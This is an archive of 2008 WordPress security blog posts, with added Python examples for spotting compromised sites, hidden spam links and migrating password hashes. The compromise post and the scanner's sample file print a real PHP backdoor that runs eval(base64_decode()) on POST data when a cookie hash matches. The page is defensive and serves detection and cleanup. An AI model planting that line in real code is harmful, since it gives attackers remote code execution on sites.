WordPress Plugin: WordPress Exploit Scanner

By: Sophia Lucero | June 27, 2008 | No Comments Yet

With all the talk about WordPress security vulnerabilities, every bit of protection helps. The WordPress Exploit Scanner plugin does just what it says: it looks for any suspicious behavior in your WordPress files and database tables.

This WordPress plugin searches the files on your site for a few known strings sometimes used by hackers, and lists them with code fragments taken from the files. It also makes a few checks of the database, looking at the active_plugins blog option, the comments table, and the posts table.

It also allows the blog owner to search for whatever string they like, which could come in handy when new exploit code is used in a hack.

Download WordPress Exploit Scanner


More WordPress blogs being hacked

By: Sophia Lucero | June 18, 2008 | No Comments Yet

Last time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, specifically a redirect technique, that’s affecting a lot of WordPress-powered blogs.

The recent security issues concern hackers who manipulate Google and other search engine results and redirect traffic away from your blog or website. The searcher clicks on the link and is redirected to the hacker’s site, with the same search string that was used in the search engine. Most bloggers notice a problem when their site traffic drops inexplicably and/or their ad income drops.

Read Lorelle’s post for more information on detecting and eliminating this security issue.


WordPress 2.5.1 Released, But You Can’t Reset Passwords and 2.5.2 is Close Behind; Will You Update?

By: Sophia Lucero | April 28, 2008 | 1 Comment

Just as Filipino bloggers trooped to U.P. Diliman for the 4th iBlog Summit, WordPress 2.5.1 was released. It has over 70 security fixes and enhancements, including a SECRET_KEY in the wp-config.php file explained in-depth by Ryan Boren.

Now it seems people are debating whether one should hold off for the next WordPress version for several reasons. First, there’s a bug that can potentially lock people out of their blogs should they wish to reset their passwords. This can be fixed by manually editing the password through phpMyAdmin, and there’s a patch for the WordPress update itself.

Second, there’s talk that WordPress 2.5.2 will soon be out. This could frustrate a lot of bloggers who aren’t really comfortable with updating WordPress.

So will you upgrade to 2.5.1 immediately, or wait until 2.5.2 comes out? I’d say it has a lot to do with how confident you are in the blog security of your current installation.


Has Your WordPress Been Hacked Recently?

By: Sophia Lucero | April 16, 2008 | 24 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the string of letters and numbers (the hash) varies.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file and then reflect those changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same name as an existing file but with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels says 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here is the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.
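The signs listed in this post (the first-line backdoor, the _new/_old/.pngg/.jpgg/.giff shadow copies, wp-info.txt dumps, the hidden “WordPress” user, and the unexpected entries in active_plugins) are exactly the kind of thing the WordPress Exploit Scanner plugin described at the top of this page automates. The script below is an added example written for this page, not the plugin’s code and not code from the original post. It walks a directory tree for the file-level indicators and queries a small SQLite stand-in for the wp_users and wp_options tables; the sample install and database it builds are constructed here (the digest in the sample backdoor is the one quoted above, and the “unknown-plugin” entry is a made-up name). Against a real site you would point scan_files at the web root and run the same two queries against MySQL.

```python
import os
import re
import sqlite3
import tempfile
from typing import Dict, List

# Shape of the first-line backdoor quoted in the post: md5($_COOKIE[...]) compared
# against a 32-hex digest, then eval(base64_decode($_POST[...])). The digest varies.
BACKDOOR_RE = re.compile(
    r"md5\(\$_COOKIE\[[^\]]+\]\)\s*==\s*[\"']?[0-9a-f]{32}[\"']?.*?"
    r"eval\(\s*base64_decode\(\s*\$_POST\[",
    re.IGNORECASE,
)
# Shadow-copy suffixes from the post, mapped to the extension of the file they shadow.
SHADOW_SUFFIXES = {"_new.php": ".php", "_old.php": ".php",
                   ".php.pngg": ".php", ".php.jpgg": ".php", ".php.giff": ".php"}
DUMP_NAMES = {"wp-info.txt"}


def scan_files(root: str) -> Dict[str, List[str]]:
    """Walk a WordPress tree and report the three file-level indicators (sorted)."""
    findings: Dict[str, List[str]] = {"backdoor": [], "shadow": [], "dump": []}
    for dirpath, _dirs, filenames in os.walk(root):
        present = set(filenames)
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name in DUMP_NAMES:
                findings["dump"].append(rel)
            for suffix, real_ext in SHADOW_SUFFIXES.items():
                if name.endswith(suffix):
                    original = name[: -len(suffix)] + real_ext
                    note = "shadows " + original if original in present else "no original"
                    findings["shadow"].append(f"{rel} ({note})")
                    break
            if name.endswith(".php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    first_line = fh.readline()      # the post says the code sits on line 1
                if BACKDOOR_RE.search(first_line):
                    findings["backdoor"].append(rel)
    return {key: sorted(value) for key, value in findings.items()}


def scan_database(conn: sqlite3.Connection, expected_plugins: List[str]) -> Dict[str, List[str]]:
    """Check wp_users for the hidden 'WordPress' user and wp_options for unexpected plugins."""
    findings: Dict[str, List[str]] = {"hidden_users": [], "unexpected_plugins": []}
    for login, registered in conn.execute("SELECT user_login, user_registered FROM wp_users"):
        # The post: a user named 'WordPress' with a registration date of all zeroes.
        if login == "WordPress" or registered.startswith("0000-00-00"):
            findings["hidden_users"].append(f"{login} (registered {registered})")
    row = conn.execute(
        "SELECT option_value FROM wp_options WHERE option_name = 'active_plugins'"
    ).fetchone()
    if row:
        # active_plugins is a PHP-serialized array of strings: s:<len>:"<path>";
        for plugin in re.findall(r's:\d+:"([^"]*)";', row[0]):
            if plugin not in expected_plugins:
                findings["unexpected_plugins"].append(plugin)
    return findings


def run_demo() -> Dict[str, List[str]]:
    """Build a constructed sample install and database, scan both, return all findings."""
    sample_files = {  # constructed contents, not real files
        "index.php": (
            "<?php if(md5($_COOKIE['_wp_debugger'])==\"dfa1bcf40aa72fdb46ed40f7651fe76e\")"
            "{ eval(base64_decode($_POST['file'])); exit; } ?>\n"
            "<?php define('WP_USE_THEMES', true); ?>\n"),
        "wp-includes/functions.php": "<?php // clean sample file ?>\n",
        "wp-content/uploads/index.php": "<?php // Silence is golden. ?>\n",
        "wp-content/uploads/index_new.php": "<?php /* constructed shadow copy */ ?>\n",
        "wp-content/uploads/wp-info.txt": "constructed placeholder, not a real dump\n",
        "wp-content/themes/default/header.php": "<?php // clean theme file ?>\n",
        "wp-content/themes/default/header.php.pngg": "<?php /* constructed shadow copy */ ?>\n",
    }
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_registered TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)",
                     [("admin", "2007-11-22 10:00:00"), ("WordPress", "0000-00-00 00:00:00")])
    conn.execute("CREATE TABLE wp_options (option_name TEXT, option_value TEXT)")
    conn.execute("INSERT INTO wp_options VALUES (?, ?)", ("active_plugins",
                 'a:2:{i:0;s:19:"akismet/akismet.php";i:1;s:33:"unknown-plugin/unknown-plugin.php";}'))
    with tempfile.TemporaryDirectory() as root:
        for rel, content in sample_files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        results = scan_files(root)
    results.update(scan_database(conn, ["akismet/akismet.php"]))
    return results


if __name__ == "__main__":
    for key, hits in run_demo().items():
        print(f"{key}: {hits}")
```

Matching only the first line keeps the check cheap on large trees, but the post also says the hash varies, so the regex matches any 32-hex digest rather than the one quoted; a scanner that also greps whole files for eval(base64_decode( will catch variants that were appended elsewhere, at the cost of more false positives from legitimate plugins.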


Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed

By: Sophia Lucero | April 8, 2008 | 7 Comments

Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.

Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observation; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.

Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.

I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!
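Because the injected links are hidden by style attributes rather than removed, you can find them by parsing your own rendered pages and flagging any anchor that is hidden either by its own inline style or by an ancestor’s. The following detector is an added example for this page, not something Technorati or WordPress publishes; the hiding patterns it looks for (display:none, visibility:hidden, zero font size, large negative offsets, the hidden attribute) are my assumptions about common tricks, and the sample page is constructed.

```python
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Inline-style tricks that hide an element from readers but not from crawlers (assumed list).
HIDING_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?:px|em|%)?(?![.\d])"
    r"|(?:left|top|text-indent)\s*:\s*-\d{3,}(?:px|em)",
    re.IGNORECASE,
)
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col", "embed", "source", "wbr"}


class HiddenLinkFinder(HTMLParser):
    """Collect (href, text) for anchors hidden by their own style or by an ancestor."""

    def __init__(self) -> None:
        super().__init__()
        self._hidden_stack: List[bool] = []   # one entry per open non-void element
        self._href: Optional[str] = None
        self._link_hidden = False
        self._text: List[str] = []
        self.hidden_links: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        style = attr.get("style") or ""
        hidden_here = bool(HIDING_STYLE.search(style)) or "hidden" in attr
        inherited = self._hidden_stack[-1] if self._hidden_stack else False
        hidden = hidden_here or inherited
        if tag not in VOID_TAGS:              # void tags never get an end tag; keep the stack balanced
            self._hidden_stack.append(hidden)
        if tag == "a":
            self._href = attr.get("href") or ""
            self._link_hidden = hidden
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            if self._link_hidden:
                self.hidden_links.append((self._href, "".join(self._text).strip()))
            self._href = None
        if tag not in VOID_TAGS and self._hidden_stack:
            self._hidden_stack.pop()


def find_hidden_links(html: str) -> List[Tuple[str, str]]:
    """Return every anchor in `html` that a reader would not see but a crawler would."""
    finder = HiddenLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.hidden_links


# Constructed sample page: one ordinary link and four crawler-only links.
SAMPLE_PAGE = """<html><body>
<p>Read my <a href="/2008/04/upgrade-notes">upgrade notes</a>.</p>
<div style="display:none"><a href="http://example.invalid/spam-a">spam a</a><br>
<a href="http://example.invalid/spam-b">spam b</a></div>
<a style="position:absolute; left:-9999px" href="http://example.invalid/spam-c">spam c</a>
<span hidden><a href="http://example.invalid/spam-d">spam d</a></span>
</body></html>"""

if __name__ == "__main__":
    for href, text in find_hidden_links(SAMPLE_PAGE):
        print(f"hidden link: {href!r} text={text!r}")
```

Run it over the HTML your server actually sends (fetch the page, do not read the theme files), since the injected markup is what visitors and crawlers receive; hiding done through an external stylesheet or script will not be caught by inline-style matching alone.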


WordPress 2.5’s New Password Hashing Scheme

By: Sophia Lucero | March 28, 2008 | 1 Comment

Ryan Boren tells us there’s a new password hashing scheme in WordPress 2.5 (along with a new format for cookie authentication). Why is this important for WordPress users with little knowledge about security?

If you share your users table with other applications or with other WordPress blogs that won’t be upgrading to 2.5 all at once, you’ll probably want to continue using MD5 hashes rather than the new hashes.

Thankfully there’s a WordPress plugin that allows us to continue using MD5 hashes. He strongly recommends installing and running it once we upgrade to 2.5.

Users that log in prior to installation of the plugin will get the new hashes, but after the plugin is active those users will be moved back to MD5 upon their next log in. If you ever want to move to the new hashes, just deactivate the plugin.
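The “moved on next login” behaviour works because a login is the only moment the application holds the plaintext password and can therefore write it back in a different format. The code below is an added example, not WordPress’s or the plugin’s code: it recognises both hash formats in a users table (a 32-character hex MD5 versus a portable hash beginning $P$), verifies the password against whichever is stored, and returns a replacement hash in the target format when the two differ. The portable-hash routine follows the phpass “portable” scheme that 2.5 adopted (salted, iterated MD5 with crypt-style base64); the default round count of 13, giving hashes that begin $P$B, is my reading of what 2.5 produced, and the deterministic salt in the test is constructed.

```python
import hashlib
import hmac
import os
import re
from typing import Optional, Tuple

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def _encode64(data: bytes, count: int) -> str:
    """phpass's crypt-style base64 (3 bytes -> 4 chars, low bits first; not RFC 4648)."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Recompute a portable ($P$/$H$) hash for `password` using the rounds and salt in `setting`."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        return "*"
    log2_rounds = ITOA64.find(setting[3])
    if log2_rounds < 7 or log2_rounds > 30:
        return "*"
    salt, pw = setting[4:12], password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << log2_rounds):           # 2**log2_rounds iterations of md5(prev || password)
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password: str, log2_rounds: int = 13, salt: Optional[bytes] = None) -> str:
    """Make a new portable hash; log2_rounds=13 yields the '$P$B' prefix (assumed 2.5 default)."""
    salt = os.urandom(6) if salt is None else salt
    setting = "$P$" + ITOA64[log2_rounds] + _encode64(salt, 6)
    return phpass_crypt(password, setting)


def md5_hex(password: str) -> str:
    """The pre-2.5 unsalted MD5 hash."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_kind(stored: str) -> str:
    if MD5_HEX.match(stored):
        return "md5"
    if stored.startswith(("$P$", "$H$")):
        return "phpass"
    return "unknown"


def check_password(password: str, stored: str) -> bool:
    """Verify against whichever format is stored, using a constant-time comparison."""
    kind = hash_kind(stored)
    if kind == "md5":
        return hmac.compare_digest(md5_hex(password), stored)
    if kind == "phpass":
        return hmac.compare_digest(phpass_crypt(password, stored), stored)
    return False


def check_and_migrate(password: str, stored: str, target: str = "phpass") -> Tuple[bool, Optional[str]]:
    """Login-time migration: (ok, new_hash). new_hash is None when no rewrite is needed.
    target='md5' mirrors the plugin in the post moving users back; 'phpass' is the 2.5 direction."""
    if not check_password(password, stored):
        return False, None
    if hash_kind(stored) == target:
        return True, None
    if target == "phpass":
        return True, phpass_hash(password)
    if target == "md5":
        return True, md5_hex(password)
    raise ValueError("unknown target " + target)


if __name__ == "__main__":
    ok, new_hash = check_and_migrate("correct horse", md5_hex("correct horse"))
    print(ok, new_hash)
```

The caller stores new_hash when it is not None and leaves the row alone otherwise; a user who never logs in again keeps the old format, which is why the post says deactivating the plugin only affects users at their next login.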


Update to WordPress 2.3.3 Now!

By: Sophia Lucero | February 5, 2008 | 1 Comment

Two months after the last upgrade, WordPress 2.3.3 is an urgent security release. It addresses an XML-RPC vulnerability that allows any user to edit any other user’s posts in the same blog, as well as some other bug fixes.

Now if updating seems too much of a chore right now and you only care about keeping your blog secure, get the updated xmlrpc.php file and you’re good to go.

Check out the whole announcement at the official WordPress blog.


WordPress 2.3.1

By: J. Angelo Racoma | November 22, 2007 | No Comments Yet

The latest stable release of WordPress as of this writing is 2.3.1. Changes from the previous version were mostly security and bug fixes.

Please head on to the official WordPress site to download.

